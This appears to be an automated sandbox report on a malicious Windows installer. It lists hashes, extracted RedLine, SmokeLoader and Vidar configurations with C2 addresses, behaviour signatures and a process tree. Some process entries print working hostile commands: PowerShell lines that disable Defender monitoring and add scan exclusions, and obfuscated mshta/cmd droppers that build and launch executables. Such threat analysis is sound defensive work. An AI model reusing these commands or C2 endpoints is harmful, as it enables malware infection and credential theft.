Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
15428s -
max time network
17999s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
02-11-2021 06:54
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media0121
C2
91.121.67.60:23325
Extracted
Family
redline
Botnet
newjust
C2
135.181.129.119:4805
Extracted
Family
smokeloader
Version
2020
C2
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
rc4.i32
rc4.i32
Extracted
Family
vidar
Version
41.6
Botnet
933
C2
https://mas.to/@lilocc
Attributes
-
profile_id
933
Signatures
-
Formbook
Formbook is a data stealing malware which is capable of stealing data.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies system executable filetype association 2 TTPs 3 IoCs
-
Process spawned unexpected child process 8 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Zloader, Terdot, DELoader, ZeusSphinx
Zloader is a malware strain that was initially discovered back in August 2015.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 24 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 7 IoCs
-
Executes dropped EXE 64 IoCs
-
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 23 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 64 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 29 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 38 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 14 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 44 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Kills process with taskkill 18 IoCs
-
Modifies Internet Explorer settings 1 TTPs 32 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 30 IoCs
-
Script User-Agent 17 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 10 IoCs
-
Suspicious use of SetWindowsHookEx 62 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS483D7956\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon17870faab0.exeMon17870faab0.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f8⤵
-
C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f11⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN11⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"12⤵
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe /S YLIH.bIN12⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -Im "Mon175e6c8b40064b8c8.exe" -f9⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS483D7956\Mon178e7a516181.exeMon178e7a516181.exe6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\zeddqjRK5Nt0tZ3qBoLBiShF.exe"C:\Users\Admin\Pictures\Adobe Films\zeddqjRK5Nt0tZ3qBoLBiShF.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\bAYBBOjPqDL83I0RlpnTqyWX.exe"C:\Users\Admin\Pictures\Adobe Films\bAYBBOjPqDL83I0RlpnTqyWX.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\lv1WjFObOkFtmMFjcOs8Lr5b.exe"C:\Users\Admin\Pictures\Adobe Films\lv1WjFObOkFtmMFjcOs8Lr5b.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\RETuVudjx66NFysfuAc3c7iE.exe"C:\Users\Admin\Pictures\Adobe Films\RETuVudjx66NFysfuAc3c7iE.exe"7⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\mw5JU8TnGlolN_o9AZ8UV5JC.exe"C:\Users\Admin\Pictures\Adobe Films\mw5JU8TnGlolN_o9AZ8UV5JC.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\mw5JU8TnGlolN_o9AZ8UV5JC.exe"C:\Users\Admin\Pictures\Adobe Films\mw5JU8TnGlolN_o9AZ8UV5JC.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\AnCdctsFOA4Jamj50y1LwMGL.exe"C:\Users\Admin\Pictures\Adobe Films\AnCdctsFOA4Jamj50y1LwMGL.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\RWNT0eZRumXl9Un3fyeMW15G.exe"C:\Users\Admin\Pictures\Adobe Films\RWNT0eZRumXl9Un3fyeMW15G.exe"7⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\6mIwBv4d5JeWSVxI688N0Bp2.exe"C:\Users\Admin\Pictures\Adobe Films\6mIwBv4d5JeWSVxI688N0Bp2.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\gMOP3J34EAsRJt9O9qulOT3m.exe"C:\Users\Admin\Pictures\Adobe Films\gMOP3J34EAsRJt9O9qulOT3m.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\smSluB04E17McvhBkWW7TtMh.exe"C:\Users\Admin\Pictures\Adobe Films\smSluB04E17McvhBkWW7TtMh.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6660 -s 4928⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\HujnmdT0OqpYSA5IB_wqlBTC.exe"C:\Users\Admin\Pictures\Adobe Films\HujnmdT0OqpYSA5IB_wqlBTC.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\ZkJmaceo9l7ppAjEu9tjrYSa.exe"C:\Users\Admin\Pictures\Adobe Films\ZkJmaceo9l7ppAjEu9tjrYSa.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\Rhz_9tBW6JMG__y4RAyBu9QD.exe"C:\Users\Admin\Documents\Rhz_9tBW6JMG__y4RAyBu9QD.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\pfAg8F8VPu7IfYcNYd834iax.exe"C:\Users\Admin\Pictures\Adobe Films\pfAg8F8VPu7IfYcNYd834iax.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\e3By4Ow3jW8t8NFiEpJAad1e.exe"C:\Users\Admin\Pictures\Adobe Films\e3By4Ow3jW8t8NFiEpJAad1e.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\fP3IjqkqHEOesrhdRyzNdJJr.exe"C:\Users\Admin\Pictures\Adobe Films\fP3IjqkqHEOesrhdRyzNdJJr.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\HTtyKFdmJz3J4SkY0tPaGH2B.exe"C:\Users\Admin\Pictures\Adobe Films\HTtyKFdmJz3J4SkY0tPaGH2B.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\EqT5LDve9aAE3qN61WAoAlB0.exe"C:\Users\Admin\Pictures\Adobe Films\EqT5LDve9aAE3qN61WAoAlB0.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"9⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )10⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\hEPbeAf5cdzCvC40FkJ2kgey.exe" ) do taskkill -f -iM "%~NxM"11⤵
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )13⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )13⤵
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC14⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "hEPbeAf5cdzCvC40FkJ2kgey.exe"12⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\N2XnjEQZk3notVmmRBXAgMj_.exe"C:\Users\Admin\Pictures\Adobe Films\N2XnjEQZk3notVmmRBXAgMj_.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c8,0x1cc,0x1d0,0x1a4,0x1d4,0x7ff87a8cdec0,0x7ff87a8cded0,0x7ff87a8cdee012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff6ad3a9e70,0x7ff6ad3a9e80,0x7ff6ad3a9e9013⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1756,17354285813170622713,15186140812965862244,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1960_713669092" --mojo-platform-channel-handle=1784 /prefetch:812⤵
-
C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"9⤵
-
C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe"C:\Users\Admin\Pictures\Adobe Films\RfrsVo1QXyIu4tRjM9YC3pg5.exe" -u10⤵
-
C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PUA46.tmp\no0l9mpWsCqV6aZKeWDYdC_0.tmp"C:\Users\Admin\AppData\Local\Temp\is-PUA46.tmp\no0l9mpWsCqV6aZKeWDYdC_0.tmp" /SL5="$603D8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\no0l9mpWsCqV6aZKeWDYdC_0.exe"10⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\is-VAHTQ.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-VAHTQ.tmp\DYbALA.exe" /S /UID=270911⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\7d-2e3d6-e29-091bb-d417d7f29bba7\ZHawaerobugi.exe"C:\Users\Admin\AppData\Local\Temp\7d-2e3d6-e29-091bb-d417d7f29bba7\ZHawaerobugi.exe"12⤵
- Checks whether UAC is enabled
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aezjghlz.v4p\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\aezjghlz.v4p\setting.exeC:\Users\Admin\AppData\Local\Temp\aezjghlz.v4p\setting.exe SID=778 CID=778 SILENT=1 /quiet14⤵
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\aezjghlz.v4p\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\aezjghlz.v4p\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634218862 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u0okwupo.1na\GcleanerEU.exe /eufive & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\u0okwupo.1na\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\u0okwupo.1na\GcleanerEU.exe /eufive14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ab5pgwbh.bht\installer.exe /qn CAMPAIGN="654" & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ab5pgwbh.bht\installer.exeC:\Users\Admin\AppData\Local\Temp\ab5pgwbh.bht\installer.exe /qn CAMPAIGN="654"14⤵
- Checks whether UAC is enabled
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ab5pgwbh.bht\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ab5pgwbh.bht\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634218862 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zujxfc34.xym\any.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\zujxfc34.xym\any.exeC:\Users\Admin\AppData\Local\Temp\zujxfc34.xym\any.exe14⤵
-
C:\Users\Admin\AppData\Local\Temp\zujxfc34.xym\any.exe"C:\Users\Admin\AppData\Local\Temp\zujxfc34.xym\any.exe" -u15⤵
- Loads dropped DLL
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebzux0qb.0jf\customer51.exe & exit13⤵
-
C:\Users\Admin\AppData\Local\Temp\ebzux0qb.0jf\customer51.exeC:\Users\Admin\AppData\Local\Temp\ebzux0qb.0jf\customer51.exe14⤵
-
